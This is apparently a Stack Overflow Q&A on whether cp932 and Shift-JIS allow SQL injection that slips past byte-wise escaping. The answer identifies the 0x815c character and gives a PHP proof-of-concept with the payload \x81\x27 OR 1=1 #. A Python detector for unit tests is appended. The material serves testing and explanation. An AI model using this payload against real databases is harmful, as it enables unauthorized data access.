php - How to create a SQL injection attack with Shift-JIS and CP932?


I'm writing unit tests to ensure that code isn't vulnerable to SQL injection under various charsets.

According to this answer, one can create a vulnerability by injecting \xbf\x27 using one of the following charsets: big5, cp932, gb2312, gbk, sjis.

This is because if the escaper is not configured correctly, it sees 0x27 and tries to escape it, so that it becomes \xbf\x5c\x27. However, \xbf\x5c is one character in these charsets, so the quote (0x27) is left unescaped.

As I've discovered through testing, however, this is not entirely true. It works for big5, gb2312 and gbk, but neither 0xbf27 nor 0xbf5c is a valid character in sjis or cp932.

Both

mb_strpos("abc\xbf\x27def", "'", 0, 'sjis')

and

mb_strpos("abc\xbf\x27def", "'", 0, 'cp932')

return 4, i.e. PHP does not see \xbf\x27 as a single character. It returns false for big5, gb2312 and gbk.

Also, this:

mb_strlen("\xbf\x5c", 'sjis')

returns 2 (it returns 1 for gbk).

So, my question is: is there a character sequence that makes sjis and cp932 vulnerable to SQL injection, or are they not vulnerable at all? Or is PHP lying, am I mistaken, and does MySQL interpret this totally differently?

The devil is in the details... Let's start with how the answer in the question describes the list of vulnerable character sets:

For this attack to work, we need the encoding that the server is expecting on the connection to both encode ' as in ASCII, i.e. 0x27, and to have some character whose final byte is an ASCII \, i.e. 0x5c. As it turns out, there are 5 such encodings supported in MySQL 5.6 by default: big5, cp932, gb2312, gbk and sjis. We'll select gbk here.

This gives context: 0xbf5c is used as an example for gbk, not as a universal character to use for all 5 character sets. It happens that the same byte sequence is a valid character under big5 and gb2312.

At this point, the question becomes as easy as this:

Which byte sequence is a valid character under cp932 and sjis, and ends in 0x5c?

To be fair, the Google searches I tried for these character sets don't give useful results. I did find this cp932.txt file, in which, if you search for '5c ' (with the space there), you'll jump to the line:

0x815c 0x2015 #horizontal bar

And we have a winner! :)

Some Oracle document confirms that 0x815c is the same character for both cp932 and sjis, and PHP recognizes it too:

php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis"));
int(1)
int(1)

Here's a PoC script for the attack:

<?php
$username = 'username';
$password = 'password';

$mysqli = new mysqli('localhost', $username, $password);
foreach (array('cp932', 'sjis') as $charset) {
    // SET NAMES changes the server-side charset only; the client library
    // still escapes byte by byte, which is what the attack relies on.
    $mysqli->query("SET NAMES {$charset}");
    $mysqli->query("CREATE DATABASE {$charset}_db CHARACTER SET {$charset}");
    $mysqli->query("USE {$charset}_db");
    $mysqli->query("CREATE TABLE foo (bar VARCHAR(16) NOT NULL)");
    $mysqli->query("INSERT INTO foo (bar) VALUES ('baz'), ('qux')");

    $input = "\x81\x27 OR 1=1 #";
    $input = $mysqli->real_escape_string($input);
    $query = "SELECT * FROM foo WHERE bar = '{$input}' LIMIT 1";
    $result = $mysqli->query($query);
    if ($result->num_rows > 1)
    {
        echo "{$charset} exploit successful!\n";
    }

    $mysqli->query("DROP DATABASE {$charset}_db");
}
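The check the asker wants to unit-test, as an added Python example that is not part of the question or answer: a byte-wise escaper (what the client does after a bare SET NAMES) beside a charset-aware one, and a detector that reads the escaped bytes in the connection charset the way the server would. Python's codec names cp932, shift_jis, gbk and big5 stand in for the MySQL charsets, and the helper names are my own.

```python
def naive_escape(data: bytes) -> bytes:
    """Byte-wise escaping: what the client library does when it still believes
    the connection is single-byte (the PoC's SET NAMES case). In PHP,
    mysqli_set_charset() is what keeps client-side escaping in step with the
    server charset."""
    return data.replace(b"\\", b"\\\\").replace(b"'", b"\\'")


def charset_aware_escape(data: bytes, charset: str):
    """Escape at the character level. Input that is not a valid byte sequence
    in the charset is rejected (returns None) instead of being patched up."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'").encode(charset)


def has_unescaped_quote(escaped: bytes, charset: str) -> bool:
    """Read the escaped bytes character by character in the connection charset
    (as the server does) and report a quote not covered by a backslash."""
    run = 0  # length of the current run of backslashes
    for ch in escaped.decode(charset, errors="replace"):
        if ch == "\\":
            run += 1
            continue
        if ch == "'" and run % 2 == 0:
            return True
        run = 0
    return False


def naive_escape_is_bypassed(data: bytes, charset: str) -> bool:
    """True when byte-wise escaping of data leaves an injectable quote once
    the bytes are interpreted in charset."""
    return has_unescaped_quote(naive_escape(data), charset)


if __name__ == "__main__":
    # Constructed probes: the page's \xbf' (gbk style) and \x81' (cp932/sjis).
    for probe in (b"\xbf'", b"\x81'"):
        for cs in ("gbk", "big5", "cp932", "shift_jis"):
            state = "bypassed" if naive_escape_is_bypassed(probe, cs) else "escaped"
            print(probe, cs, state)
```

The probe table reproduces the page's findings: \xbf' only gets through under gbk and big5, while \x81' gets through under cp932 and shift_jis because 0x815c decodes as one character.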
